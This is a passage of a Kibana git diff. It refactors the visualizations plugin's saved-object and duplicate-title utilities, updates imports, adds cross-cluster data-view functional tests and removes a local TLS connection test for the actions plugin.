core, plugins } = getStartDeps(); - const showNoResult = shouldShowNoResultsMessage(visData, visType); - - const renderComplete = () => { - // Renaming according to business requirements - const visTypeTelemetryMap: Record = { - histogram: 'vertical_bar', - }; - const containerType = extractContainerType(handlers.getExecutionContext()); - const visualizationType = 'agg_based'; - - if (plugins.usageCollection && containerType) { - const hasMixedXY = new Set(visConfig.seriesParams.map((item) => item.type)); - const counterEvents = [ - `render_${visualizationType}_${visTypeTelemetryMap[visType] ?? visType}`, - hasMixedXY.size > 1 ? `render_${visualizationType}_mixed_xy` : undefined, - ].filter(Boolean) as string[]; - - plugins.usageCollection.reportUiCounter(containerType, METRIC_TYPE.COUNT, counterEvents); - } - - handlers.done(); - }; - - handlers.onDestroy(() => unmountComponentAtNode(domNode)); - - render( - - - - - - - , - domNode - ); - }, -}); diff --git a/src/plugins/vis_types/xy/tsconfig.json b/src/plugins/vis_types/xy/tsconfig.json index ab3f3d1252ed8..7cc6e60099cbf 100644 --- a/src/plugins/vis_types/xy/tsconfig.json +++ b/src/plugins/vis_types/xy/tsconfig.json @@ -15,10 +15,7 @@ "references": [ { "path": "../../../core/tsconfig.json" }, { "path": "../../charts/tsconfig.json" }, - { "path": "../../data/tsconfig.json" }, - { "path": "../../expressions/tsconfig.json" }, { "path": "../../visualizations/tsconfig.json" }, - { "path": "../../usage_collection/tsconfig.json" }, { "path": "../../kibana_utils/tsconfig.json" }, { "path": "../../vis_default_editor/tsconfig.json" }, ] diff --git a/src/plugins/visualizations/public/embeddable/visualize_embeddable_factory.tsx b/src/plugins/visualizations/public/embeddable/visualize_embeddable_factory.tsx index 05e7ea218325b..4dcaa582511c3 100644 --- a/src/plugins/visualizations/public/embeddable/visualize_embeddable_factory.tsx +++ b/src/plugins/visualizations/public/embeddable/visualize_embeddable_factory.tsx @@ -25,8 +25,8 @@ import { IContainer, AttributeService, } from '@kbn/embeddable-plugin/public'; -import { checkForDuplicateTitle } from '@kbn/saved-objects-plugin/public'; import type { StartServicesGetter } from '@kbn/kibana-utils-plugin/public'; +import { checkForDuplicateTitle } from '../utils/saved_objects_utils/check_for_duplicate_title'; import type { DisabledLabEmbeddable } from './disabled_lab_embeddable'; import type { VisualizeByReferenceInput, @@ -271,17 +271,18 @@ export class VisualizeEmbeddableFactory } } - public async checkTitle(props: OnSaveProps): Promise { + public async checkTitle(props: OnSaveProps): Promise { const savedObjectsClient = await this.deps.start().core.savedObjects.client; const overlays = await this.deps.start().core.overlays; + return checkForDuplicateTitle( { title: props.newTitle, - copyOnSave: false, lastSavedTitle: '', getEsType: () => this.type, getDisplayName: this.getDisplayName || (() => this.type), }, + false, props.isTitleDuplicateConfirmed, props.onTitleDuplicate, { diff --git a/src/plugins/visualizations/public/legacy/vis_update_state.js b/src/plugins/visualizations/public/legacy/vis_update_state.js index db6a9f2beb776..00853a2af8c6e 100644 --- a/src/plugins/visualizations/public/legacy/vis_update_state.js +++ b/src/plugins/visualizations/public/legacy/vis_update_state.js @@ -6,7 +6,7 @@ * Side Public License, v 1. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import _ from 'lodash'; /** diff --git a/src/plugins/visualizations/public/persisted_state/persisted_state.ts b/src/plugins/visualizations/public/persisted_state/persisted_state.ts index dcc86228031fa..74b23081c4ace 100644 --- a/src/plugins/visualizations/public/persisted_state/persisted_state.ts +++ b/src/plugins/visualizations/public/persisted_state/persisted_state.ts @@ -8,7 +8,7 @@ import { EventEmitter } from 'events'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { isPlainObject, cloneDeep, get, isEqual, isString, merge, mergeWith, toPath } from 'lodash'; function prepSetParams(key: PersistedStateKey, value: any, path: PersistedStatePath) { diff --git a/src/plugins/visualizations/public/types.ts b/src/plugins/visualizations/public/types.ts index 8c09258f83546..c69f7894fa326 100644 --- a/src/plugins/visualizations/public/types.ts +++ b/src/plugins/visualizations/public/types.ts @@ -48,7 +48,7 @@ export interface ISavedVis { export interface VisSavedObject extends ISavedVis { lastSavedTitle: string; getEsType: () => string; - getDisplayName?: () => string; + getDisplayName: () => string; displayName: string; migrationVersion?: SavedObjectsMigrationVersion; searchSource?: ISearchSource; diff --git a/src/plugins/visualizations/public/utils/saved_objects_utils/check_for_duplicate_title.ts b/src/plugins/visualizations/public/utils/saved_objects_utils/check_for_duplicate_title.ts index 3dc876a7e32e7..e4a006212d767 100644 --- a/src/plugins/visualizations/public/utils/saved_objects_utils/check_for_duplicate_title.ts +++ b/src/plugins/visualizations/public/utils/saved_objects_utils/check_for_duplicate_title.ts @@ -7,13 +7,13 @@ */ import type { OverlayStart, SavedObjectsClientContract } from '@kbn/core/public'; -import type { SavedObject } from '@kbn/saved-objects-plugin/public'; +import type { VisSavedObject } from '../../types'; import { SAVE_DUPLICATE_REJECTED } from './constants'; import { findObjectByTitle } from './find_object_by_title'; import { displayDuplicateTitleConfirmModal } from './display_duplicate_title_confirm_modal'; /** - * check for an existing SavedObject with the same title in ES + * check for an existing VisSavedObject with the same title in ES * returns Promise when it's no duplicate, or the modal displaying the warning * that's there's a duplicate is confirmed, else it returns a rejected Promise * @param savedObject @@ -23,16 +23,17 @@ import { displayDuplicateTitleConfirmModal } from './display_duplicate_title_con */ export async function checkForDuplicateTitle( savedObject: Pick< - SavedObject, - 'id' | 'title' | 'getDisplayName' | 'lastSavedTitle' | 'copyOnSave' | 'getEsType' + VisSavedObject, + 'id' | 'title' | 'lastSavedTitle' | 'getDisplayName' | 'getEsType' >, + copyOnSave: boolean, isTitleDuplicateConfirmed: boolean, onTitleDuplicate: (() => void) | undefined, services: { savedObjectsClient: SavedObjectsClientContract; overlays: OverlayStart; } -): Promise { +): Promise { const { savedObjectsClient, overlays } = services; // Don't check for duplicates if user has already confirmed save with duplicate title if (isTitleDuplicateConfirmed) { @@ -41,7 +42,7 @@ export async function checkForDuplicateTitle( // Don't check if the user isn't updating the title, otherwise that would become very annoying to have // to confirm the save every time, except when copyOnSave is true, then we do want to check. - if (savedObject.title === savedObject.lastSavedTitle && !savedObject.copyOnSave) { + if (savedObject.title === savedObject.lastSavedTitle && !copyOnSave) { return true; } diff --git a/src/plugins/visualizations/public/utils/saved_objects_utils/confirm_modal_promise.tsx b/src/plugins/visualizations/public/utils/saved_objects_utils/confirm_modal_promise.tsx index 66395d4b3722e..4e8bc7b9e7228 100644 --- a/src/plugins/visualizations/public/utils/saved_objects_utils/confirm_modal_promise.tsx +++ b/src/plugins/visualizations/public/utils/saved_objects_utils/confirm_modal_promise.tsx @@ -17,7 +17,7 @@ export function confirmModalPromise( title = '', confirmBtnText = '', overlays: OverlayStart -): Promise { +): Promise { return new Promise((resolve, reject) => { const cancelButtonText = i18n.translate('visualizations.confirmModal.cancelButtonLabel', { defaultMessage: 'Cancel', diff --git a/src/plugins/visualizations/public/utils/saved_objects_utils/display_duplicate_title_confirm_modal.ts b/src/plugins/visualizations/public/utils/saved_objects_utils/display_duplicate_title_confirm_modal.ts index 9291b2a29e0a0..4ce7f2ec33e40 100644 --- a/src/plugins/visualizations/public/utils/saved_objects_utils/display_duplicate_title_confirm_modal.ts +++ b/src/plugins/visualizations/public/utils/saved_objects_utils/display_duplicate_title_confirm_modal.ts @@ -8,14 +8,14 @@ import { i18n } from '@kbn/i18n'; import type { OverlayStart } from '@kbn/core/public'; -import type { SavedObject } from '@kbn/saved-objects-plugin/public'; +import type { VisSavedObject } from '../../types'; import { SAVE_DUPLICATE_REJECTED } from './constants'; import { confirmModalPromise } from './confirm_modal_promise'; export function displayDuplicateTitleConfirmModal( - savedObject: Pick, + savedObject: Pick, overlays: OverlayStart -): Promise { +): Promise { const confirmMessage = i18n.translate( 'visualizations.confirmModal.saveDuplicateConfirmationMessage', { diff --git a/src/plugins/visualizations/public/utils/saved_objects_utils/find_object_by_title.test.ts b/src/plugins/visualizations/public/utils/saved_objects_utils/find_object_by_title.test.ts index 8c8bda93ce13e..91ccf9262df95 100644 --- a/src/plugins/visualizations/public/utils/saved_objects_utils/find_object_by_title.test.ts +++ b/src/plugins/visualizations/public/utils/saved_objects_utils/find_object_by_title.test.ts @@ -7,7 +7,7 @@ */ import { findObjectByTitle } from './find_object_by_title'; -import { SavedObjectsClientContract, SavedObject } from '@kbn/core/public'; +import { SavedObjectsClientContract, SimpleSavedObject } from '@kbn/core/public'; import { simpleSavedObjectMock } from '@kbn/core/public/mocks'; describe('findObjectByTitle', () => { @@ -25,7 +25,8 @@ describe('findObjectByTitle', () => { it('matches any case', async () => { const indexPattern = simpleSavedObjectMock.create(savedObjectsClient, { attributes: { title: 'foo' }, - } as SavedObject); + } as SimpleSavedObject); + savedObjectsClient.find = jest.fn().mockImplementation(() => Promise.resolve({ savedObjects: [indexPattern], diff --git a/src/plugins/visualizations/public/utils/saved_objects_utils/save_with_confirmation.test.ts b/src/plugins/visualizations/public/utils/saved_objects_utils/save_with_confirmation.test.ts index fc5581eb3ed05..05512a421c28d 100644 --- a/src/plugins/visualizations/public/utils/saved_objects_utils/save_with_confirmation.test.ts +++ b/src/plugins/visualizations/public/utils/saved_objects_utils/save_with_confirmation.test.ts @@ -13,6 +13,7 @@ import type { } from '@kbn/core/public'; import type { SavedObjectsClientContract } from '@kbn/core/public'; import { saveWithConfirmation } from './save_with_confirmation'; +import { VisSavedObject } from '../../types'; import * as deps from './confirm_modal_promise'; import { OVERWRITE_REJECTED } from './constants'; @@ -25,7 +26,7 @@ describe('saveWithConfirmation', () => { getEsType: () => 'test type', title: 'test title', displayName: 'test display name', - }; + } as VisSavedObject; beforeEach(() => { savedObjectsClient.create = jest.fn(); diff --git a/src/plugins/visualizations/public/utils/saved_objects_utils/save_with_confirmation.ts b/src/plugins/visualizations/public/utils/saved_objects_utils/save_with_confirmation.ts index a33fbd18f1b4f..ea46095d589bf 100644 --- a/src/plugins/visualizations/public/utils/saved_objects_utils/save_with_confirmation.ts +++ b/src/plugins/visualizations/public/utils/saved_objects_utils/save_with_confirmation.ts @@ -16,27 +16,24 @@ import type { } from '@kbn/core/public'; import { OVERWRITE_REJECTED } from './constants'; import { confirmModalPromise } from './confirm_modal_promise'; +import type { VisSavedObject } from '../../types'; /** * Attempts to create the current object using the serialized source. If an object already * exists, a warning message requests an overwrite confirmation. * @param source - serialized version of this object what will be indexed into elasticsearch. - * @param savedObject - a simple object that contains properties title and displayName, and getEsType method + * @param savedObject - VisSavedObject * @param options - options to pass to the saved object create method * @param services - provides Kibana services savedObjectsClient and overlays * @returns {Promise} - A promise that is resolved with the objects id if the object is * successfully indexed. If the overwrite confirmation was rejected, an error is thrown with * a confirmRejected = true parameter so that case can be handled differently than * a create or index error. - * @resolved {SavedObject} + * @resolved {SimpleSavedObject} */ export async function saveWithConfirmation( source: SavedObjectAttributes, - savedObject: { - getEsType(): string; - title: string; - displayName: string; - }, + savedObject: VisSavedObject, options: SavedObjectsCreateOptions, services: { savedObjectsClient: SavedObjectsClientContract; overlays: OverlayStart } ) { diff --git a/src/plugins/visualizations/public/utils/saved_visualize_utils.ts b/src/plugins/visualizations/public/utils/saved_visualize_utils.ts index df7565827dd9f..2238ff7cf054a 100644 --- a/src/plugins/visualizations/public/utils/saved_visualize_utils.ts +++ b/src/plugins/visualizations/public/utils/saved_visualize_utils.ts @@ -370,10 +370,8 @@ export async function saveVisualization( try { await checkForDuplicateTitle( - { - ...savedObject, - copyOnSave, - } as any, + savedObject, + copyOnSave, isTitleDuplicateConfirmed, onTitleDuplicate, services as any diff --git a/src/plugins/visualizations/public/visualize_app/components/visualize_listing.tsx b/src/plugins/visualizations/public/visualize_app/components/visualize_listing.tsx index 59017aa643cc7..d3c2c75bca853 100644 --- a/src/plugins/visualizations/public/visualize_app/components/visualize_listing.tsx +++ b/src/plugins/visualizations/public/visualize_app/components/visualize_listing.tsx @@ -34,6 +34,7 @@ import { getTableColumns, getNoItemsMessage } from '../utils'; export const VisualizeListing = () => { const { services: { + core, application, executionContext, chrome, @@ -108,8 +109,8 @@ export const VisualizeListing = () => { const noItemsFragment = useMemo(() => getNoItemsMessage(createNewVis), [createNewVis]); const tableColumns = useMemo( - () => getTableColumns(application, kbnUrlStateStorage, savedObjectsTagging), - [application, kbnUrlStateStorage, savedObjectsTagging] + () => getTableColumns(core, kbnUrlStateStorage, savedObjectsTagging), + [core, kbnUrlStateStorage, savedObjectsTagging] ); const fetchItems = useCallback( diff --git a/src/plugins/visualizations/public/visualize_app/utils/get_table_columns.tsx b/src/plugins/visualizations/public/visualize_app/utils/get_table_columns.tsx index 03cb64920879e..adb9e3d9ef3e9 100644 --- a/src/plugins/visualizations/public/visualize_app/utils/get_table_columns.tsx +++ b/src/plugins/visualizations/public/visualize_app/utils/get_table_columns.tsx @@ -18,10 +18,10 @@ import { } from '@elastic/eui'; import { i18n } from '@kbn/i18n'; import { FormattedMessage } from '@kbn/i18n-react'; -import { ApplicationStart } from '@kbn/core/public'; import { IKbnUrlStateStorage } from '@kbn/kibana-utils-plugin/public'; import type { SavedObjectsTaggingApi } from '@kbn/saved-objects-tagging-oss-plugin/public'; -import { RedirectAppLinks } from '@kbn/kibana-react-plugin/public'; +import { RedirectAppLinks } from '@kbn/shared-ux-link-redirect-app'; +import type { CoreStart } from '@kbn/core/public'; import { VisualizationListItem } from '../..'; import { getVisualizeListItemLink } from './get_visualize_list_item_link'; @@ -80,7 +80,7 @@ const renderItemTypeIcon = (item: VisualizationListItem) => { }; export const getTableColumns = ( - application: ApplicationStart, + core: CoreStart, kbnUrlStateStorage: IKbnUrlStateStorage, taggingApi?: SavedObjectsTaggingApi ) => @@ -91,12 +91,17 @@ export const getTableColumns = ( defaultMessage: 'Title', }), sortable: true, - render: (field: string, { editApp, editUrl, title, error, type }: VisualizationListItem) => + render: (field: string, { editApp, editUrl, title, error }: VisualizationListItem) => // In case an error occurs i.e. the vis has wrong type, we render the vis but without the link !error ? ( - + {field} diff --git a/test/accessibility/apps/discover.ts b/test/accessibility/apps/discover.ts index da42d38cf835b..afb75a670881d 100644 --- a/test/accessibility/apps/discover.ts +++ b/test/accessibility/apps/discover.ts @@ -155,8 +155,7 @@ export default function ({ getService, getPageObjects }: FtrProviderContext) { await testSubjects.click('discoverChartOptionsToggle'); }); - // https://github.com/elastic/eui/issues/5900 - it.skip('a11y test for data grid sort panel', async () => { + it('a11y test for data grid sort panel', async () => { await testSubjects.click('dataGridColumnSortingButton'); await a11y.testAppSnapshot(); await browser.pressKeys(browser.keys.ESCAPE); diff --git a/test/api_integration/apis/telemetry/utils/schema_to_config_schema.ts b/test/api_integration/apis/telemetry/utils/schema_to_config_schema.ts index deb6218e145af..b80a42e101284 100644 --- a/test/api_integration/apis/telemetry/utils/schema_to_config_schema.ts +++ b/test/api_integration/apis/telemetry/utils/schema_to_config_schema.ts @@ -8,7 +8,7 @@ import type { ObjectType, Type } from '@kbn/config-schema'; import { schema } from '@kbn/config-schema'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { get, merge } from 'lodash'; import type { AllowedSchemaTypes } from '@kbn/usage-collection-plugin/server'; diff --git a/test/functional/apps/management/ccs_compatibility/_data_views_ccs.ts b/test/functional/apps/management/ccs_compatibility/_data_views_ccs.ts new file mode 100644 index 0000000000000..d2ab2b64bf738 --- /dev/null +++ b/test/functional/apps/management/ccs_compatibility/_data_views_ccs.ts @@ -0,0 +1,95 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import expect from '@kbn/expect'; +import { FtrProviderContext } from '../../../ftr_provider_context'; + +export default function ({ getService, getPageObjects }: FtrProviderContext) { + const kibanaServer = getService('kibanaServer'); + const testSubjects = getService('testSubjects'); + const es = getService('es'); + const PageObjects = getPageObjects(['settings', 'common', 'header']); + const security = getService('security'); + + describe('data views ccs', function () { + before(async function () { + await security.testUser.setRoles(['kibana_admin']); + }); + + describe('index pattern wizard ccs', () => { + describe('remote cluster only', async () => { + beforeEach(async function () { + await kibanaServer.uiSettings.replace({}); + await PageObjects.settings.navigateTo(); + await PageObjects.settings.clickKibanaIndexPatterns(); + }); + it('create index pattern using remote name', async () => { + await PageObjects.settings.createIndexPattern('ftr-remote:logstash*', null); + await PageObjects.settings.clickKibanaIndexPatterns(); + const indexPatternList = await PageObjects.settings.getIndexPatternList(); + expect(indexPatternList.length).to.eql(1); + }); + it('create index pattern with wildcards in remote name', async () => { + await PageObjects.settings.createIndexPattern('*t*-remo*:log*', null); + await PageObjects.settings.clickKibanaIndexPatterns(); + const indexPatternList = await PageObjects.settings.getIndexPatternList(); + expect(indexPatternList.length).to.eql(1); + }); + + afterEach(async () => { + await PageObjects.header.waitUntilLoadingHasFinished(); + await testSubjects.exists('indexPatternTable'); + await kibanaServer.savedObjects.cleanStandardList(); + }); + }); + describe('remote and local clusters', async () => { + before(async () => { + await es.transport.request({ + path: '/blogs/_doc', + method: 'POST', + body: { user: 'cuffs', message: 20 }, + }); + }); + + beforeEach(async function () { + // delete .kibana index and then wait for Kibana to re-create it + await kibanaServer.uiSettings.replace({}); + await PageObjects.settings.navigateTo(); + await PageObjects.settings.clickKibanaIndexPatterns(); + }); + it('combined remote cluster and local cluster data view without wildcards', async () => { + await PageObjects.settings.createIndexPattern('blog*, ftr-remote:log*', null); + await PageObjects.settings.clickKibanaIndexPatterns(); + const indexPatternList = await PageObjects.settings.getIndexPatternList(); + expect(indexPatternList.length).to.eql(1); + }); + it('combined remote cluster and local cluster data view with wildcards', async () => { + await PageObjects.settings.createIndexPattern('blog*, *t*-remo*:lo*', null); + await PageObjects.settings.clickKibanaIndexPatterns(); + const indexPatternList = await PageObjects.settings.getIndexPatternList(); + expect(indexPatternList.length).to.eql(1); + }); + + afterEach(async () => { + await PageObjects.header.waitUntilLoadingHasFinished(); + await testSubjects.exists('indexPatternTable'); + await kibanaServer.savedObjects.cleanStandardList(); + }); + after(async () => { + await es.transport.request({ + path: '/blogs', + method: 'DELETE', + }); + }); + }); + after(async () => { + await security.testUser.restoreDefaults(); + }); + }); + }); +} diff --git a/test/functional/apps/management/ccs_compatibility/index.ts b/test/functional/apps/management/ccs_compatibility/index.ts new file mode 100644 index 0000000000000..14c0c90e7b951 --- /dev/null +++ b/test/functional/apps/management/ccs_compatibility/index.ts @@ -0,0 +1,30 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import { FtrProviderContext } from '../../../ftr_provider_context'; + +export default function ({ getService, loadTestFile }: FtrProviderContext) { + const remoteEsArchiver = getService('remoteEsArchiver' as 'esArchiver'); + const esArchiver = getService('esArchiver'); + + describe('management', function () { + before(async () => { + await remoteEsArchiver.loadIfNeeded( + 'test/functional/fixtures/es_archiver/logstash_functional' + ); + await esArchiver.loadIfNeeded('test/functional/fixtures/es_archiver/makelogs'); + }); + + after(async () => { + await remoteEsArchiver.unload('test/functional/fixtures/es_archiver/logstash_functional'); + await esArchiver.unload('test/functional/fixtures/es_archiver/makelogs'); + }); + + loadTestFile(require.resolve('./_data_views_ccs')); + }); +} diff --git a/test/functional/config.ccs.ts b/test/functional/config.ccs.ts index 6e3f92ac37b8e..c5c303cdf22c5 100644 --- a/test/functional/config.ccs.ts +++ b/test/functional/config.ccs.ts @@ -21,6 +21,7 @@ export default async function ({ readConfigFile }: FtrConfigProviderContext) { require.resolve('./apps/dashboard/group3'), require.resolve('./apps/discover/ccs_compatibility'), require.resolve('./apps/console/_console_ccs'), + require.resolve('./apps/management/ccs_compatibility'), ], services: { diff --git a/test/functional/page_objects/discover_page.ts b/test/functional/page_objects/discover_page.ts index 8700cc734d809..ab453fc2378ed 100644 --- a/test/functional/page_objects/discover_page.ts +++ b/test/functional/page_objects/discover_page.ts @@ -505,6 +505,15 @@ export class DiscoverPageObject extends FtrService { await this.header.waitUntilLoadingHasFinished(); } + public async getIndexPatterns() { + await this.testSubjects.click('discover-dataView-switch-link'); + const indexPatternSwitcher = await this.testSubjects.find('indexPattern-switcher'); + const li = await indexPatternSwitcher.findAllByTagName('li'); + const items = await Promise.all(li.map((lis) => lis.getVisibleText())); + await this.testSubjects.click('discover-dataView-switch-link'); + return items; + } + public async selectTextBaseLang(lang: 'SQL') { await this.testSubjects.click('discover-dataView-switch-link'); await this.find.clickByCssSelector( diff --git a/tsconfig.base.json b/tsconfig.base.json index 36988b9e4e9f0..68882faec661a 100644 --- a/tsconfig.base.json +++ b/tsconfig.base.json @@ -151,8 +151,6 @@ "@kbn/screenshot-mode-plugin/*": ["src/plugins/screenshot_mode/*"], "@kbn/share-plugin": ["src/plugins/share"], "@kbn/share-plugin/*": ["src/plugins/share/*"], - "@kbn/shared-ux-plugin": ["src/plugins/shared_ux"], - "@kbn/shared-ux-plugin/*": ["src/plugins/shared_ux/*"], "@kbn/telemetry-collection-manager-plugin": ["src/plugins/telemetry_collection_manager"], "@kbn/telemetry-collection-manager-plugin/*": ["src/plugins/telemetry_collection_manager/*"], "@kbn/telemetry-management-section-plugin": ["src/plugins/telemetry_management_section"], diff --git a/x-pack/packages/ml/aiops_components/src/dual_brush/dual_brush.tsx b/x-pack/packages/ml/aiops_components/src/dual_brush/dual_brush.tsx index c593da55ffded..7dc3274c73228 100644 --- a/x-pack/packages/ml/aiops_components/src/dual_brush/dual_brush.tsx +++ b/x-pack/packages/ml/aiops_components/src/dual_brush/dual_brush.tsx @@ -234,6 +234,10 @@ export function DualBrush({ .attr('id', (b: DualBrush) => { return 'aiops-brush-' + b.id; }) + .attr('data-test-subj', (b: DualBrush) => { + // Uppercase the first character of the `id` so we get aiopsBrushBaseline/aiopsBrushDeviation. + return 'aiopsBrush' + b.id.charAt(0).toUpperCase() + b.id.slice(1); + }) .each((brushObject: DualBrush, i, n) => { const x = d3.scaleLinear().domain([min, max]).rangeRound([0, widthRef.current]); brushObject.brush(d3.select(n[i])); @@ -314,6 +318,7 @@ export function DualBrush({ {width > 0 && ( {!isRunning && ( )} {isRunning && ( - - + + )} diff --git a/x-pack/plugins/actions/jest.integration.config.js b/x-pack/plugins/actions/jest.integration.config.js new file mode 100644 index 0000000000000..41bd46b12005e --- /dev/null +++ b/x-pack/plugins/actions/jest.integration.config.js @@ -0,0 +1,12 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +module.exports = { + preset: '@kbn/test/jest_integration_node', + rootDir: '../../..', + roots: ['/x-pack/plugins/actions'], +}; diff --git a/x-pack/plugins/actions/server/builtin_action_types/lib/axios_utils_connection.test.ts b/x-pack/plugins/actions/server/builtin_action_types/lib/axios_utils_connection.test.ts deleted file mode 100644 index d5daa33cbb47c..0000000000000 --- a/x-pack/plugins/actions/server/builtin_action_types/lib/axios_utils_connection.test.ts +++ /dev/null @@ -1,284 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -import { readFileSync as fsReadFileSync } from 'fs'; -import { resolve as pathResolve, join as pathJoin } from 'path'; -import http from 'http'; -import https from 'https'; -import axios from 'axios'; -import { duration as momentDuration } from 'moment'; -import { schema } from '@kbn/config-schema'; - -import { request } from './axios_utils'; -import { ByteSizeValue } from '@kbn/config-schema'; -import { Logger } from '@kbn/core/server'; -import { loggingSystemMock } from '@kbn/core/server/mocks'; -import { createReadySignal } from '@kbn/event-log-plugin/server/lib/ready_signal'; -import { ActionsConfig } from '../../config'; -import { - ActionsConfigurationUtilities, - getActionsConfigurationUtilities, -} from '../../actions_config'; - -const logger = loggingSystemMock.create().get() as jest.Mocked; - -const CERT_DIR = '../../../../../../../packages/kbn-dev-utils/certs'; - -const KIBANA_CRT_FILE = pathResolve(__filename, pathJoin(CERT_DIR, 'kibana.crt')); -const KIBANA_KEY_FILE = pathResolve(__filename, pathJoin(CERT_DIR, 'kibana.key')); -const CA_FILE = pathResolve(__filename, pathJoin(CERT_DIR, 'ca.crt')); - -const KIBANA_KEY = fsReadFileSync(KIBANA_KEY_FILE, 'utf8'); -const KIBANA_CRT = fsReadFileSync(KIBANA_CRT_FILE, 'utf8'); -const CA = fsReadFileSync(CA_FILE, 'utf8'); - -describe('axios connections', () => { - let testServer: http.Server | https.Server; - // eslint-disable-next-line @typescript-eslint/no-explicit-any - let savedAxiosDefaultsAdapter: any; - - beforeAll(() => { - // needed to prevent the dreaded Error: Cross origin http://localhost forbidden - // see: https://github.com/axios/axios/issues/1754#issuecomment-572778305 - savedAxiosDefaultsAdapter = axios.defaults.adapter; - axios.defaults.adapter = require('axios/lib/adapters/http'); - }); - - afterAll(() => { - axios.defaults.adapter = savedAxiosDefaultsAdapter; - }); - - beforeEach(() => { - jest.resetAllMocks(); - }); - - afterEach(() => { - testServer.close(); - }); - - describe('http', () => { - test('it works', async () => { - const { url, server } = await createServer(); - testServer = server; - - const configurationUtilities = getACUfromConfig(); - const res = await request({ axios, url, logger, configurationUtilities }); - expect(res.status).toBe(200); - }); - }); - - describe('https', () => { - test('it fails with self-signed cert and no overrides', async () => { - const { url, server } = await createServer(true); - testServer = server; - - const configurationUtilities = getACUfromConfig(); - const fn = async () => await request({ axios, url, logger, configurationUtilities }); - await expect(fn()).rejects.toThrow('certificate'); - }); - - test('it works with verificationMode "none" config', async () => { - const { url, server } = await createServer(true); - testServer = server; - - const configurationUtilities = getACUfromConfig({ - ssl: { - verificationMode: 'none', - }, - }); - const res = await request({ axios, url, logger, configurationUtilities }); - expect(res.status).toBe(200); - }); - - test('it works with verificationMode "none" for custom host config', async () => { - const { url, server } = await createServer(true); - testServer = server; - - const configurationUtilities = getACUfromConfig({ - customHostSettings: [{ url, ssl: { verificationMode: 'none' } }], - }); - const res = await request({ axios, url, logger, configurationUtilities }); - expect(res.status).toBe(200); - }); - - test('it works with ca in custom host config', async () => { - const { url, server } = await createServer(true); - testServer = server; - - const configurationUtilities = getACUfromConfig({ - customHostSettings: [{ url, ssl: { certificateAuthoritiesData: CA } }], - }); - const res = await request({ axios, url, logger, configurationUtilities }); - expect(res.status).toBe(200); - }); - - test('it fails with incorrect ca in custom host config', async () => { - const { url, server } = await createServer(true); - testServer = server; - - const configurationUtilities = getACUfromConfig({ - customHostSettings: [{ url, ssl: { certificateAuthoritiesData: KIBANA_CRT } }], - }); - const fn = async () => await request({ axios, url, logger, configurationUtilities }); - await expect(fn()).rejects.toThrow('certificate'); - }); - - test('it works with incorrect ca in custom host config but verificationMode "none"', async () => { - const { url, server } = await createServer(true); - testServer = server; - - const configurationUtilities = getACUfromConfig({ - customHostSettings: [ - { - url, - ssl: { - certificateAuthoritiesData: CA, - verificationMode: 'none', - }, - }, - ], - }); - const res = await request({ axios, url, logger, configurationUtilities }); - expect(res.status).toBe(200); - }); - - test('it works with incorrect ca in custom host config but verificationMode config "full"', async () => { - const { url, server } = await createServer(true); - testServer = server; - - const configurationUtilities = getACUfromConfig({ - ssl: { - verificationMode: 'none', - }, - customHostSettings: [ - { - url, - ssl: { - certificateAuthoritiesData: CA, - }, - }, - ], - }); - const res = await request({ axios, url, logger, configurationUtilities }); - expect(res.status).toBe(200); - }); - - test('it fails with no matching custom host settings', async () => { - const { url, server } = await createServer(true); - const otherUrl = 'https://example.com'; - testServer = server; - - const configurationUtilities = getACUfromConfig({ - customHostSettings: [{ url: otherUrl, ssl: { verificationMode: 'none' } }], - }); - const fn = async () => await request({ axios, url, logger, configurationUtilities }); - await expect(fn()).rejects.toThrow('certificate'); - }); - - test('it fails cleanly with a garbage CA 1', async () => { - const { url, server } = await createServer(true); - testServer = server; - - const configurationUtilities = getACUfromConfig({ - customHostSettings: [{ url, ssl: { certificateAuthoritiesData: 'garbage' } }], - }); - const fn = async () => await request({ axios, url, logger, configurationUtilities }); - await expect(fn()).rejects.toThrow('certificate'); - }); - - test('it fails cleanly with a garbage CA 2', async () => { - const { url, server } = await createServer(true); - testServer = server; - - const ca = '-----BEGIN CERTIFICATE-----\ngarbage\n-----END CERTIFICATE-----\n'; - const configurationUtilities = getACUfromConfig({ - customHostSettings: [{ url, ssl: { certificateAuthoritiesData: ca } }], - }); - const fn = async () => await request({ axios, url, logger, configurationUtilities }); - await expect(fn()).rejects.toThrow('certificate'); - }); - }); -}); - -interface CreateServerResult { - url: string; - server: http.Server | https.Server; -} - -async function createServer(useHttps: boolean = false): Promise { - let server: http.Server | https.Server; - const readySignal = createReadySignal(); - - if (!useHttps) { - server = http.createServer((req, res) => { - res.writeHead(200); - res.end('http: just testing that a connection could be made'); - }); - } else { - const httpsOptions = { - cert: KIBANA_CRT, - key: KIBANA_KEY, - }; - server = https.createServer(httpsOptions, (req, res) => { - res.writeHead(200); - res.end('https: just testing that a connection could be made'); - }); - } - - server.listen(() => { - const addressInfo = server.address(); - if (addressInfo == null || typeof addressInfo === 'string') { - server.close(); - throw new Error('error getting address of server, closing'); - } - - const url = localUrlFromPort(useHttps, addressInfo.port, 'localhost'); - readySignal.signal({ server, url }); - }); - - // let the node process stop if for some reason this server isn't closed - server.unref(); - - return readySignal.wait(); -} - -const BaseActionsConfig: ActionsConfig = { - allowedHosts: ['*'], - enabledActionTypes: ['*'], - preconfiguredAlertHistoryEsIndex: false, - preconfigured: {}, - proxyUrl: undefined, - 